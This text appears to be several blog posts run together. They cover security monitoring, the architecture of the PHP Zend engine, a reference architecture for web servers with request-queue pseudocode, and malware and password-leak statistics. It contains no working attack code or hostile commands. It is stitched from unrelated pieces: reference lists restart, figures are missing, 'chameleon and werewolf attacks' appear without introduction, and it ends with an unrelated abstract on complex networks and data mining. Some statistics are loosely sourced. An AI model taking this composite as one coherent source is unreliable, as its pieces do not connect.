Just some personal notes and thoughts about a different approach to cybersecurity defense systems.

In cyberspace, the everyday life of an Information System (IS) looks more or less like this:

  1. It may be the target of a cyberattack by malicious individuals or organizations;
  2. If the cyberattack succeeds, the Information System may be compromised, either covertly or overtly;
  3. If we realize that the Information System is compromised, we start security crisis management;
  4. After incident management, we analyze what happened and try to further harden the defense system.

Cybersecurity attacks

Cyberspace is not a secure world: you can be the target of many types of attacks, for example:

  • Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks;
  • Man-in-the-middle (MitM) attack;
  • Drive-by attack;
  • Password attack;
  • SQL injection attack;
  • Cross-site scripting (XSS) attack;
  • Eavesdropping attack;
  • Birthday attack;
  • Malware attack;
  • Phishing and spear phishing attacks;
  • And so on.

Cybersecurity hidden incident

The attack has succeeded, but we have no idea what is going on. This is the worst situation we can be in: no one alerts us about it. The question is: where is my high-level defense system? In this situation only a very smart and effective monitoring system can detect that the system is compromised and locate the problem.

Cybersecurity manifest incident

If the attack has succeeded and we realize that our information system is compromised, we can only face and manage the incident, which could be:

  • Data leakage of any type: emails, photos, credit card data, sensitive personal data and so on;
  • Crashed websites;
  • Breached networks;
  • Denial of service;
  • Hacked devices;
  • Loss of an organization's reputation due to information leakage or a successful cyberattack, with huge economic losses;
  • Loss of personal reputation;
  • And so on.

Post-incident analysis

In this phase we assess the causes and analyze the company's crisis management capabilities in order to eliminate deficiencies in the cyber defense system and improve its resilience.

First line of defense model

But what is the first line of defense? As we can see in the schema, it is the monitoring system. Its role is crucial and fundamental. At every fraction of a second it has to tell us:

  • First of all: "I'm fine, I'm working well, I'm not compromised";
  • the IS is not under attack;
  • the IS is working according to the specifications and is not compromised.

or, when something goes wrong:

  • The IS is under attack but is not compromised, and I am immediately informing the emergency team so that they can stop the attack.
  • The system is compromised: I didn't detect the intrusion, but I realize that the attack succeeded and we need to recover. This is the worst situation, but the monitor's alert system reports it immediately in order to contain the damage.


If any of the statements above turns out to be false ("fake news"), the monitoring system is not working well. In that case we are in a very bad situation, which we need to minimize by improving, every day, the control and auditing capabilities and the intelligence of the monitoring system.
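The reports above can be sketched as a small classification function. This is only a minimal sketch under our own assumptions: the names (Report, classify), the heartbeat timestamp used to model "I'm fine, I'm working well" and the max_silence threshold are hypothetical and not taken from any real monitoring product. The point it illustrates is that the monitor must vouch for itself first: if it stops reporting, none of its other statements can be trusted.

```python
from enum import Enum


class Report(Enum):
    ALL_CLEAR = "IS not under attack and working according to the specifications"
    UNDER_ATTACK = "IS under attack but not compromised: emergency team alerted"
    COMPROMISED = "IS compromised: start recovery and contain the damage"
    MONITOR_DOWN = "monitor silent: none of its reports can be trusted"


def classify(now, last_heartbeat, max_silence, attack_detected, compromise_detected):
    """Map the monitor's current observations to one of the reports above."""
    # First of all the monitor must prove it is alive: a stale heartbeat
    # means it may itself be broken or compromised.
    if now - last_heartbeat > max_silence:
        return Report.MONITOR_DOWN
    # A detected compromise outranks an attack that is still in progress.
    if compromise_detected:
        return Report.COMPROMISED
    if attack_detected:
        return Report.UNDER_ATTACK
    return Report.ALL_CLEAR
```

For example, classify(10.0, 9.5, 1.0, True, False) returns Report.UNDER_ATTACK, while the same call with a last heartbeat at 5.0 returns Report.MONITOR_DOWN.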

But what does monitoring mean?

Monitoring means checking and verifying that everything is working according to the rules and specifications.

Monitoring should take place at different levels:

  • Network level, i.e. packet analysis and so on;
  • Operating system level;
  • Application level;
  • User behavior;

and it should analyze, combine and correlate events across these levels for better control of the IS. I think we can have the latest defense technology, but without a very smart monitor working 24/7 on the information system we don't have a good cybersecurity system.
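As a rough illustration of correlating events across levels, the following sketch raises an alert when events from at least three different levels hit the same host within a short time window. The Event fields, the level names and the thresholds are assumptions made for the example; a real monitor (for instance a SIEM) would use far richer rules.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    timestamp: float   # seconds since some reference time
    host: str
    level: str         # "network", "os", "application" or "user"
    description: str


def correlate(events, window, min_levels=3):
    """Return one (host, first_timestamp, levels) alert for each host on which
    events from at least `min_levels` distinct levels fall within `window` seconds."""
    by_host = defaultdict(list)
    for event in events:
        by_host[event.host].append(event)

    alerts = []
    for host, host_events in by_host.items():
        host_events.sort(key=lambda e: e.timestamp)
        start = 0
        for end, last in enumerate(host_events):
            # Slide the window start forward until it spans at most `window` seconds.
            while last.timestamp - host_events[start].timestamp > window:
                start += 1
            levels = {e.level for e in host_events[start:end + 1]}
            if len(levels) >= min_levels:
                alerts.append((host, host_events[start].timestamp, frozenset(levels)))
                break  # one alert per host is enough for this sketch
    return alerts
```

A port scan, a burst of SQL errors and a new root process on the same web server within ten seconds would produce one alert, while each event taken alone would not.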

The PHP Server Engine Architecture

PHP is a recursive acronym that stands for “PHP: Hypertext Preprocessor” (though it originally stood for “Personal Home Page” in 1995). It allows code to be embedded within HTML templates, using a language similar to Perl and Unix shells.

It is parsed and executed by the Zend Engine on the server side.

Figure 1 - PHP Web Server Architecture

Zend refers to the language engine, PHP's core. “The Zend Engine is an open source, opcode-based scripting engine (a virtual machine), commonly known for the important role it plays in the web automation language PHP. It was originally developed by Andi Gutmans and Zeev Suraski while they were students at the Technion - Israel Institute of Technology. They later founded a company called Zend Technologies in Ramat Gan, Israel. The name Zend is a combination of their forenames, Zeev and Andi.”¹

We now describe the most important modules of the PHP web server shown in Figure 1.

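External modules can be loaded from disk at script runtime using the function “bool dl(string $library)”; when the script terminates, the external module is discarded from memory. In current PHP versions dl() is only available in the CLI and embed SAPIs (and in CGI when run from the command line), so on a typical web server extensions are loaded at startup instead.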

Built-in modules are compiled directly into PHP and carried around with every PHP process; their functionality is available to every script that's being run.

Memory management: Zend takes full control over all memory allocations: it determines whether a block is in use and automatically frees unused blocks and blocks with lost references, thus preventing memory leaks.
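The idea of freeing "blocks with lost references" can be illustrated with reference counting. The toy allocator below is a hypothetical sketch, not Zend's actual allocator: each block carries a counter of the references pointing to it, and the block is freed as soon as the counter drops to zero. Plain reference counting cannot free cycles (two blocks referencing each other), which is why PHP has also shipped a cycle collector since version 5.3.

```python
class Heap:
    """Toy allocator: every block carries a reference count and is freed
    automatically when the count drops to zero (no cycle detection)."""

    def __init__(self):
        self.live = {}      # block id -> [refcount, value]
        self.next_id = 0

    def alloc(self, value):
        block = self.next_id
        self.next_id += 1
        self.live[block] = [1, value]   # the creator holds the first reference
        return block

    def incref(self, block):
        # A new variable now points to the block.
        self.live[block][0] += 1

    def decref(self, block):
        # A reference went away; free the block when none are left.
        self.live[block][0] -= 1
        if self.live[block][0] == 0:
            del self.live[block]
```

A block allocated once and shared by a second variable survives the first decref and disappears from live after the second.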

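Zend Executor: the Zend Engine compiles PHP code into an intermediate code made of opcodes, which is executed by the Zend Executor: each opcode is run by its own handler function inside the Zend virtual machine. (Since PHP 8, an optional JIT compiler can also translate opcodes into machine code.)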


How PHP Server Engine works

A PHP script is executed by walking it through the following steps:

  1. The script is run through a lexical analyzer, which converts the human-readable code into tokens. These tokens are then passed to the parser.

  2. The parser parses, manipulates and optimizes the stream of tokens passed to it by the lexical analyzer and generates an intermediate code called opcodes² that runs on the Zend Engine. These two steps, which make up the compilation phase, are performed by the Run-Time Compiler module shown in Figure 1.

  3. Once the intermediate code has been generated, it is passed to the Executor, which steps through the op array, calling a handler function for each opcode, and generates the HTML output.

  4. The generated HTML is sent to the client; if the web browser supports compressed web pages, the HTML is encoded using gzip or deflate before being sent.

  5. The opcodes are flushed from memory after execution.
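To make the steps above more concrete, here is a toy version of the whole pipeline for a tiny language that only knows echo, integers, + and *. It is a hypothetical sketch, not the Zend Engine: lex() plays the lexical analyzer, Compiler plays the parser that emits three-address opcodes as described in footnote 2 (two input operands, one result operand and a handler name), and execute() plays the Executor, keeping temporaries in a flat list that stands in for the VM registers. The handler names only loosely echo real Zend opcodes such as ZEND_ADD, ZEND_MUL and ZEND_ECHO.

```python
import re

# Numbers, the "echo" keyword, or any other single non-space character.
TOKEN_RE = re.compile(r"\s*(?:(\d+)|(echo)|(\S))")


def lex(src):
    """Lexical analysis: turn source text into (kind, value) tokens."""
    tokens = []
    for number, keyword, symbol in TOKEN_RE.findall(src):
        if number:
            tokens.append(("NUM", int(number)))
        elif keyword:
            tokens.append(("ECHO", keyword))
        else:
            tokens.append(("SYM", symbol))
    return tokens


class Compiler:
    """Recursive-descent parser that emits three-address opcodes
    (handler, op1, op2, result); operands are ("CONST", value) or ("TMP", slot)."""

    def __init__(self, tokens):
        self.tokens, self.pos = tokens, 0
        self.opcodes, self.tmp_count = [], 0

    def peek(self):
        return self.tokens[self.pos] if self.pos < len(self.tokens) else ("EOF", None)

    def take(self):
        token = self.peek()
        self.pos += 1
        return token

    def emit(self, handler, op1, op2):
        result = ("TMP", self.tmp_count)   # a fresh temporary (VM register)
        self.tmp_count += 1
        self.opcodes.append((handler, op1, op2, result))
        return result

    def factor(self):
        kind, value = self.take()
        if kind == "NUM":
            return ("CONST", value)
        if (kind, value) == ("SYM", "("):
            inner = self.expr()
            if self.take() != ("SYM", ")"):
                raise SyntaxError("expected ')'")
            return inner
        raise SyntaxError(f"unexpected token {value!r}")

    def term(self):
        # '*' binds tighter than '+', so it is handled one level deeper.
        left = self.factor()
        while self.peek() == ("SYM", "*"):
            self.take()
            left = self.emit("MUL", left, self.factor())
        return left

    def expr(self):
        left = self.term()
        while self.peek() == ("SYM", "+"):
            self.take()
            left = self.emit("ADD", left, self.term())
        return left

    def program(self):
        while self.peek()[0] == "ECHO":
            self.take()
            self.opcodes.append(("ECHO", self.expr(), None, None))
            if self.take() != ("SYM", ";"):
                raise SyntaxError("expected ';'")
        return self.opcodes, self.tmp_count


HANDLERS = {"ADD": lambda a, b: a + b, "MUL": lambda a, b: a * b}


def execute(opcodes, tmp_count):
    """Executor: walk the op array, calling the handler of each opcode."""
    tmps, output = [None] * tmp_count, []

    def read(operand):
        kind, value = operand
        return value if kind == "CONST" else tmps[value]

    for handler, op1, op2, result in opcodes:
        if handler == "ECHO":
            output.append(str(read(op1)))
        else:
            tmps[result[1]] = HANDLERS[handler](read(op1), read(op2))
    return "".join(output)
```

Compiling "echo 1 + 2 * 3; echo (1 + 2) * 3;" with Compiler(lex(...)).program() and passing the result to execute() yields "79"; the first opcode emitted is ("MUL", ("CONST", 2), ("CONST", 3), ("TMP", 0)), because * binds tighter than +.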

Here is the modern workflow, which uses a cache to speed up PHP processing:

2 This intermediate code is an ordered array of instructions (known as opcodes, short for operation codes) that are basically three-address code: two operands for the inputs, a third operand for the result, plus the handler that processes the operands. The operands are either constants or an offset to a temporary variable, which is effectively a register in the Zend virtual machine.

Figure 2 - Zend Processing
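The cache in Figure 2 can be sketched as follows. This is a toy model under our own assumptions: an in-memory dictionary keyed by the script path, invalidated when the file's modification time changes, with compile_fn standing in for the lexer plus parser. PHP's bundled OPcache extension follows a similar idea, storing compiled scripts in shared memory and, when opcache.validate_timestamps is enabled, checking whether the file has changed.

```python
import os


class OpcodeCache:
    """Toy opcode cache: compiled op arrays are kept in memory, keyed by the
    script path, and reused while the file's modification time is unchanged."""

    def __init__(self, compile_fn):
        self.compile_fn = compile_fn   # turns source text into opcodes
        self.entries = {}              # path -> (mtime, opcodes)
        self.compilations = 0

    def get(self, path):
        mtime = os.stat(path).st_mtime
        cached = self.entries.get(path)
        if cached is not None and cached[0] == mtime:
            return cached[1]           # cache hit: lexing and parsing are skipped
        with open(path, encoding="utf-8") as f:
            opcodes = self.compile_fn(f.read())
        self.compilations += 1
        self.entries[path] = (mtime, opcodes)
        return opcodes
```

Any function that turns source text into opcodes can be plugged in as compile_fn; the second request for an unchanged script is served without recompiling it.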


A simple example

Let’s consider the following PHP document (.php) in order to understand what happens (the array $aGuest of guest names is assumed to be already defined):



<html>
<head>
<title>Party List</title>
</head>
<body>
<p> The list of participants to the event is: </p>
<ol>
<?php
foreach ($aGuest as $Guest) {
    echo "<li>" . $Guest . "</li>";
}
?>
</ol>
</body>
</html>

Input PHP document

The .php file is pre-processed by the server: text embedded within “<?php ?>” blocks is treated as PHP code, while text outside these blocks becomes the argument of “print” statements. The pre-processing phase produces the following file.

print "<html>";
print "<head>";
print "<title>Party List</title>";
print "</head>";
print "<body>";
print "<p> The list of participants to the event is: </p>";
print "<ol>";
foreach ($aGuest as $Guest) {
    echo "<li>" . $Guest . "</li>";
}
print "</ol>";
print "</body>";
print "</html>";

PHP document after pre-processing

The file above is then processed by the PHP processor (Zend Engine), which generates the following HTML document and sends it back to the user agent:

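<html>
<head>
<title>Party List</title>
</head>
<body>
<p> The list of participants to the event is: </p>
<ol>
<!-- one <li> element for each name in $aGuest -->
</ol>
</body>
</html>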

PHP document after Zend Engine Processing
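The pre-processing step of this example can be sketched in a few lines. The function below follows the model described above (text outside <?php ?> becomes print statements, code inside is kept as it is); it is an illustrative assumption, not what PHP literally does: the real lexer emits the text outside the tags as T_INLINE_HTML tokens, which are compiled into echo opcodes.

```python
import re

# Non-greedy, so each <?php ... ?> block is matched separately.
PHP_BLOCK = re.compile(r"<\?php(.*?)\?>", re.DOTALL)


def _prints(text):
    """Wrap each non-empty line of literal text in a PHP print statement."""
    out = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            # Escape the characters that are special inside PHP double quotes.
            escaped = line.replace("\\", "\\\\").replace('"', '\\"').replace("$", "\\$")
            out.append(f'print "{escaped}";')
    return out


def preprocess(template):
    """Return the list of PHP statements equivalent to a .php template."""
    statements, pos = [], 0
    for match in PHP_BLOCK.finditer(template):
        statements += _prints(template[pos:match.start()])
        statements.append(match.group(1).strip())   # PHP code, kept as it is
        pos = match.end()
    statements += _prints(template[pos:])
    return statements
```

Applied to the Party List template, it produces the same sequence of print statements shown above, with the foreach block copied unchanged.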


Web servers, browsers, and proxies communicate by exchanging HTTP messages over the network, using the request-response virtual circuit.

Web servers enable HTTP access to a collection of documents and other information, organized into a tree structure much like a computer file system.

Figure 1 - Request-Response Schema

A web server receives and interprets HTTP requests from a client, generally a browser. It then examines each request and maps the resource identifier to a file, or forwards the request to a program that produces the requested data. Finally, the server sends the response back to the client.

The behaviour of a single-tasking HTTP server, described using the Petri net¹ formalism, is shown in Fig. 2.

1 A Petri net consists of places, transitions, and directed arcs. Arcs run from a place to a transition or vice versa, never between places or between transitions. The places from which an arc runs to a transition are called the input places of the transition; the places to which arcs run from a transition are called the output places of the transition. More information is available at http://en.wikipedia.org/wiki/Petri_net.

Figure 2 – Behavior of a single-tasking HTTP server.
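The firing rule behind this formalism is easy to express in code. The sketch below is a generic place/transition net with arcs of weight one; the places and transitions of the example (idle, request_pending, busy, response_sent, accept, reply) are hypothetical and only approximate a single-tasking server, since they are not read from Fig. 2. The single token in idle is what makes the server single-tasking: while a request is being served, accept is not enabled and further requests must wait.

```python
from collections import Counter


class PetriNet:
    """Place/transition net with arcs of weight one."""

    def __init__(self, marking, transitions):
        self.marking = Counter(marking)    # place -> number of tokens
        self.transitions = transitions     # name -> (input places, output places)

    def enabled(self, name):
        # A transition is enabled when every input place holds a token.
        inputs, _ = self.transitions[name]
        return all(self.marking[p] >= 1 for p in inputs)

    def fire(self, name):
        # Firing consumes one token per input place and produces one per output place.
        if not self.enabled(name):
            raise ValueError(f"transition {name!r} is not enabled")
        inputs, outputs = self.transitions[name]
        for p in inputs:
            self.marking[p] -= 1
        for p in outputs:
            self.marking[p] += 1


# Hypothetical single-tasking server: one "idle" token, two requests waiting.
server = PetriNet(
    {"idle": 1, "request_pending": 2},
    {
        "accept": (["idle", "request_pending"], ["busy"]),
        "reply": (["busy"], ["idle", "response_sent"]),
    },
)
```

After server.fire("accept"), the second pending request cannot be accepted until server.fire("reply") returns the token to idle.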


In this section we show the reference architecture for the web server domain. It defines the fundamental components of the domain and the relations between them.

The reference architecture provides a common nomenclature across all software systems in the same domain, which allows us:

  1. to describe the architecture of a web server uniformly, and to understand a particular web server by going first through its conceptual architecture and then through its concrete architecture, which may have extra features depending on its design goals. For example, not all web servers can serve Java Servlets;

  2. to compare different architectures using a common level of abstraction.

The proposed web server reference architecture is shown in Fig. 3. It specifies the data flow and the dependencies between the seven subsystems, which are divided between two layers: a server layer and a support layer.

Figure 3 - Web Server reference architecture.

The server layer contains five subsystems that encapsulate the operating system and provide the requested resources to the browser using the functionality of the local operating system. We now describe each subsystem of this layer.

  • The Reception subsystem implements the following functionalities:

  1. It waits for the HTTP requests that arrive from the user agent through the network. It also contains the logic and the data structures needed to handle multiple browser requests simultaneously.

  2. It parses each request and, after building an internal representation of it, sends it to the next subsystem.

  3. Finally, it sends back the response to the request, according to the capabilities of the browser.

  • The Request Analyzer subsystem operates on the internal request received from the Reception subsystem. It translates the location of the resource from a network location to a local file name. It also corrects user typing errors: for example, if the user typed indAx.html, the Request Analyzer automatically corrects it to index.html.

  • The Access Control subsystem authenticates the browsers, requesting a username and password, and authorizes their access to the requested resources.

  • The Resource Handler subsystem determines the type of resource requested by the browser: a static file that can be sent back directly to the user, or a program that must be executed to generate the response.

  • The Transaction Log subsystem records all the requests and their results.
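Two of these subsystems can be sketched in a few lines: the Request Analyzer mapping a URL path to a local file name (including the typo correction of the indAx.html example) and the Resource Handler deciding between a static file and a program. The document root, the list of script extensions and the use of difflib similarity matching for typo correction are assumptions made for the example; Apache's mod_speling is a real module that performs this kind of correction.

```python
import difflib
import posixpath

DOC_ROOT = "/var/www"                   # hypothetical document root
SCRIPT_EXTENSIONS = {".php", ".cgi"}    # hypothetical "program" extensions


def analyze(url_path, known_files):
    """Request Analyzer: map a URL path to a local file name, correcting
    small typing errors against the files that actually exist."""
    # normpath resolves "." and "..", so a request cannot climb above DOC_ROOT.
    relative = posixpath.normpath("/" + url_path).lstrip("/")
    if relative not in known_files:
        guesses = difflib.get_close_matches(relative, known_files, n=1, cutoff=0.8)
        if not guesses:
            return None                 # nothing close enough: a 404 response
        relative = guesses[0]
    return posixpath.join(DOC_ROOT, relative)


def resource_kind(local_path):
    """Resource Handler: a static file to send back, or a program to execute."""
    _, ext = posixpath.splitext(local_path)
    return "program" if ext in SCRIPT_EXTENSIONS else "static"
```

With known files index.html and guests.php, analyze("/indAx.html", ...) returns "/var/www/index.html", and resource_kind("/var/www/guests.php") returns "program".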

The support layer contains two subsystems that provide services used by the upper server layer.

  • The Utility subsystem contains functions that are used by all other subsystems.

  • The Operating System Abstraction Layer (OSAL) encapsulates the operating system specific functionality to facilitate the porting of the web server to different platforms. This layer will not exist in a server that is designed to run on only one platform.

There are two other aspects that characterize a web server architecture and come into play during its activity:

  • The processing model: it describes the type of process or threading model used to support web server operation;

  • The pool-size behaviour: it specifies how the size of the pool of processes or threads varies over time as a function of the workload.

The main processing models are:

    • Process-based servers: the web server uses multiple single-threaded processes each of which handles one HTTP request at a time.

Figure 4 - Web Server: Process-Based model.

    • Thread-based servers: the web server consists of a single multithreaded process; each thread handles one request at a time.

Figure 5 - Web Server: Thread-Based model.

    • Hybrid model servers: the web server consists of multiple multithreaded processes, with each thread of any process handling one request at a time.

Figure 6 - Web Server: multiple multi-threaded processes.
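The thread-based model can be illustrated with Python's threading and queue modules. This is a simplified batch simulation rather than a real server: the requests are plain strings, handler stands for whatever produces the response, and num_threads is an arbitrary value. Each thread takes one request at a time from a shared queue, which is also where requests wait when all threads are busy (a static pool).

```python
import queue
import threading


def thread_based_server(requests, handler, num_threads=4):
    """One process, several threads, each thread serving one request at a time."""
    pending = queue.Queue()
    for req in requests:
        pending.put(req)
    responses = {}
    lock = threading.Lock()

    def worker():
        while True:
            try:
                req = pending.get_nowait()
            except queue.Empty:
                return              # no more requests: the thread exits
            resp = handler(req)
            with lock:              # protect the shared result table
                responses[req] = resp

    threads = [threading.Thread(target=worker) for _ in range(num_threads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return responses
```

The process-based model would replace threading.Thread with separate processes; the hybrid model would run several such thread pools, one per process.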

For the pool-size behaviour there are two approaches:

  1. Static approach: the web server creates a fixed number of processes and threads at the start-up time. If the number of requests exceeds the number of threads/processes, the requests wait in the queue until a thread/process becomes free to serve it.

  2. Dynamic approach: the web server increases or decreases the pool of workers (processes and threads) as a function of the number of requests. This behaviour reduces the queue size and the waiting time of each request.
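A dynamic pool-size policy can be reduced to a function that, at each interval, decides how many workers the pool should have. The sketch below is one possible policy under our own assumptions (grow by one worker per waiting request, shrink by one when the queue is empty, stay within fixed bounds); real servers expose similar knobs, for example Apache's prefork MPM with MinSpareServers and MaxSpareServers. A static pool corresponds to always returning the same size.

```python
def next_pool_size(current, queue_length, min_workers=2, max_workers=32, shrink_step=1):
    """Dynamic approach: return the pool size for the next interval.

    Grow by one worker per waiting request, shrink gradually when nothing
    is waiting, and always stay within [min_workers, max_workers]."""
    if queue_length > 0:
        target = current + queue_length
    else:
        target = current - shrink_step
    return max(min_workers, min(max_workers, target))
```

With 4 workers and 3 queued requests the pool grows to 7; with 30 workers and 10 queued requests it is capped at 32.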

Reception Subsystem: queue of requests and responses management

The Reception subsystem maintains a queue of requests and responses to carry out its job within a single, continuously open connection. A series of requests may be transmitted over it, and the responses to these requests must be sent back in order of request arrival (FIFO). One common solution is for the server to maintain both an input queue and an output queue of requests. When a request is submitted for processing, it is removed from the input queue and inserted into the output queue. Once processing is complete, the request is marked for release, but it remains on the output queue while at least one of its predecessors is still there. When the response is sent back to the browser, the related request is released. The following snippet, written in a C-like pseudocode, shows how the queues of requests and responses are managed.


// UserRequest: represents the user request
// WebResponse: represents the related web response

RequestQueueElement  = (UserRequest, Marker);        // Marker: set once processing is complete
ResponseQueueElement = (WebResponse, RelatedUserRequest);

// Requests that have not been processed yet
Queue<RequestQueueElement> RequestInputQueue;

// Requests that are being processed or have already been processed, in arrival order
Queue<RequestQueueElement> RequestOutputQueue;

// Responses related to user requests
Queue<ResponseQueueElement> ResponseOutputQueue;

while (true) {

    if (<a user request has arrived>) {
        Enqueue(UserRequest, RequestInputQueue);
    }

    if (<a user request can be processed>) {
        UserRequestInProcessing = Dequeue(RequestInputQueue);
        Enqueue(UserRequestInProcessing, RequestOutputQueue);
    }

    if (<a user request has been processed>) {
        MarkForRelease(UserRequest, RequestOutputQueue);
        Enqueue((WebResponse, UserRequest), ResponseOutputQueue);
    }

    // FIFO policy: a response may leave only when its request is at the head of
    // RequestOutputQueue, i.e. when no predecessor is still there.
    // (Head, IsMarked, RemoveResponseFor and Send are illustrative helpers.)
    if (Length(RequestOutputQueue) > 0 && IsMarked(Head(RequestOutputQueue))) {
        Response = RemoveResponseFor(Head(RequestOutputQueue), ResponseOutputQueue);
        Send(Response.WebResponse);
        RemoveFrom(Response.RelatedUserRequest, RequestOutputQueue);
    }
}
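The same queue discipline can be written as runnable code. The sketch below is our own Python rendering of the idea, with hypothetical names (PipelinedConnection, arrive, start_next, finish): a request stays in the output queue until its response is ready and all its predecessors have been released, so responses always leave in arrival order even when processing finishes out of order. A response value of None is reserved to mean "still in processing".

```python
from collections import OrderedDict, deque


class PipelinedConnection:
    """Responses on one persistent connection leave in request-arrival order."""

    def __init__(self):
        self.input_queue = deque()          # arrived, not yet processed
        self.output_queue = OrderedDict()   # request id -> response (None = in processing)
        self.sent = []                      # responses written to the client, in order

    def arrive(self, request_id):
        self.input_queue.append(request_id)

    def start_next(self):
        # Move the oldest waiting request from the input to the output queue.
        request_id = self.input_queue.popleft()
        self.output_queue[request_id] = None
        return request_id

    def finish(self, request_id, response):
        # Mark the request for release by storing its response...
        self.output_queue[request_id] = response
        # ...then release marked requests from the head, stopping at the
        # first predecessor that is still being processed.
        while self.output_queue:
            head_id, head_response = next(iter(self.output_queue.items()))
            if head_response is None:
                break
            self.sent.append(head_response)
            del self.output_queue[head_id]
```

If requests 1, 2 and 3 are all in processing and request 2 finishes first, nothing is sent; when request 1 finishes, responses 1 and 2 leave together, followed later by response 3.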





[01] Andrea Nicchi, Web Applications: technologies and models, EAI, 2014;


Strong interests in cyberspace drive the production of large amounts of highly sophisticated malicious software.

Entering cyberspace probably means becoming a target of thieves, hackers, activists, terrorists, nation-state cyber warriors and foreign intelligence services. In this scenario, the fierce competition in cybercrime and cyberwarfare brings a continuous proliferation of malicious programs and an increase in their level of sophistication.



According to data published by the major antivirus companies, there are on average 400,000 new malware samples every day.

Malware per Day

These figures may be somewhat inflated by the antivirus companies, but even if we consider only 2% of 400,000 to be true, we still have 8,000 new strains of computer malware in the wild every day.

Today it is impossible to live without digital technology, which is the basis of the digital society in which governments, institutions, industries and individuals operate and interact in everyday life.

So, to face high-profile data breaches and ever-increasing cyber threats coming from the digital world itself, huge investments in information security are made around the world (according to Gartner, spending in 2015 was above $75.4 billion).

But security seems an illusion after hearing about the results of research carried out at Imperva, a data security research firm in California.
A group of researchers infected a computer with 82 new malware samples and ran 40 threat-detection engines from the most important antivirus companies against them.
Only 5 percent of the malware samples were detected. This means that, although antivirus software is almost useless against new malware, it is still necessary to protect us from already known malware, and so it raises our overall level of security and protection.



In the leak involving Twitter on June 8th 2016, user accounts were hacked, but not on Twitter's servers. This means that 32,888,300 users were hacked one by one, reportedly by a Russian hacker. This is astonishing and underlines how easy it is to guess users' passwords and to infect users' computers in order to steal their credentials.
The password frequencies in the following chart show that users don't pay much attention to the passwords they use. The chart considers only the 25 most used passwords; the statistics are computed on 20,210,641 user accounts released from several leaks [04].
They probably think: why would anyone hack me? I'm an ordinary guy, who cares about me? But what matters to a bad guy is profit, and a huge quantity of accounts to sell on the dark market is a good reason to steal every Twitter user's credentials. In fact, volume is the key factor that attracts buyers.

Most Used Password

Even though chameleon and werewolf attacks can easily bypass antivirus defenses, it is important to pay more attention to our access keys in order to prevent the leakage of such huge quantities of user accounts because, I think, most of the Twitter user accounts were simply guessed by the bad guy.
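Frequency statistics like those in the chart are straightforward to compute from a leaked list. The function below is a minimal sketch; the sample passwords in the usage note are made up for illustration and are not taken from the leak statistics cited above.

```python
from collections import Counter


def top_passwords(passwords, n=25):
    """Return (password, count, percentage of accounts) for the n most used passwords."""
    counts = Counter(passwords)
    total = len(passwords)
    return [(pwd, count, 100.0 * count / total) for pwd, count in counts.most_common(n)]
```

For the made-up list ["123456", "password", "123456", "qwerty"] and n=2, the result is [("123456", 2, 50.0), ("password", 1, 25.0)]; with equal counts, Counter.most_common keeps the order in which elements were first seen.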




Malicious software is characterized by four components:

  • propagation methods,
  • exploits,
  • payloads,
  • level of sophistication.


Propagation methods are the means by which malicious code is transported from the origin to the target. They depend on scale and specificity. The target may be the machines connected to the Internet (large scale), for example when someone tries to create a botnet, or a small area network (small scale), for example when a company is going to be attacked for some reason.
Specificity relates to the constraints placed on malicious code. Technical constraints may be a particular operating system or software version; constraints based on personal information may be account credentials, details about co-workers or the presence of certain filenames on the victim's machine.
The level of propagation is directly proportional to the probability of detection and to the limitation of the defensive response.

Exploits enable the propagation method and the operation of the payload.
The severity of an exploit is indicated by the CVSS score [02] assigned to the vulnerability it exploits.
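CVSS base scores range from 0.0 to 10.0 and, in versions 3.x, are mapped to qualitative severity ratings. A minimal sketch of that mapping follows; the thresholds are those of the qualitative severity rating scale in the CVSS v3.1 specification published by FIRST.

```python
def cvss_severity(score):
    """Map a CVSS v3.x base score to its qualitative severity rating."""
    if not 0.0 <= score <= 10.0:
        raise ValueError("CVSS scores range from 0.0 to 10.0")
    if score == 0.0:
        return "None"
    if score < 4.0:
        return "Low"        # 0.1 - 3.9
    if score < 7.0:
        return "Medium"     # 4.0 - 6.9
    if score < 9.0:
        return "High"       # 7.0 - 8.9
    return "Critical"       # 9.0 - 10.0
```

A remotely exploitable vulnerability scored 9.8, for instance, is rated Critical.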

The payload is the code written to manipulate system resources and create some effect on a computer system.
Today we see an increase in the level of payload customization: there are payloads for web servers, desktop computers, domain controllers, smartphones, and so on. Every payload is tailored to a specific target in order to be very small and to maximize the likelihood of success.

The level of sophistication of malicious code can tell us useful things. Malicious Software Sophistication (MASS) analysis is an approach that can be used to figure out who is behind it: individuals, groups, organizations or states.
In this scenario we have, on one side, generic malware created by individuals or small groups who generally use third-party exploit kits like the Blackhole Exploit Kit [05]; on the other side, organizations or states with greater resources, who can develop innovative attack methods and new exploits, like Duqu 2.0 [06], described as the most sophisticated malware ever seen.


The balance of power between attacker and defender is strongly asymmetric. The defender needs huge resources to defend himself, also because he has to act proactively against these kinds of threats.
The study of malicious code is important to understand how attackers act, in order to detect attacks in progress and to prepare a better defense response.



[01] Trey Herr, Eric Armbrust, Milware: Identification and Implications of State Authored Malicious Software, The George Washington University, 2015;
[02] https://www.first.org/: CVSS: Common Vulnerability Scoring System;

[03] Marc Goodman, Future Crimes: Inside the Digital Underground and the Battle for Our Connected World, Anchor Books, 2015.
[04] https://www.leakedsource.com/: leaked databases that contain information of large public interest.
[05] https://en.wikipedia.org/wiki/Blackhole_exploit_kit: The Blackhole exploit kit is as of 2012 the most prevalent web threat.

[06] https://en.wikipedia.org/wiki/Duqu_2.0: Kaspersky discovered the malware, and Symantec confirmed those findings.


Combining complex networks and data mining: Why and how

The increasing power of computer technology does not dispense with the need to extract meaningful information out of data sets of ever growing size, and indeed typically exacerbates the complexity of this task. To tackle this general problem, two methods have emerged, at chronologically different times, that are now commonly used in the scientific community: data mining and complex network theory. Not only do complex network analysis and data mining share the same general goal, that of extracting information from complex systems to ultimately create a new compact quantifiable representation, but they also often address similar problems too. In the face of that, a surprisingly low number of researchers turn out to resort to both methodologies. One may then be tempted to conclude that these two fields are either largely redundant or totally antithetic. The starting point of this review is that this state of affairs should be put down to contingent rather than conceptual differences, and that these two fields can in fact advantageously be used in a synergistic manner. An overview of both fields is first provided, some fundamental concepts of which are illustrated. A variety of contexts in which complex network theory and data mining have been used in a synergistic manner are then presented. Contexts in which the appropriate integration of complex network metrics can lead to improved classification rates with respect to classical data mining algorithms and, conversely, contexts in which data mining can be used to tackle important issues in complex network theory applications are illustrated. Finally, ways to achieve a tighter integration between complex networks and data mining, and open lines of research are discussed.

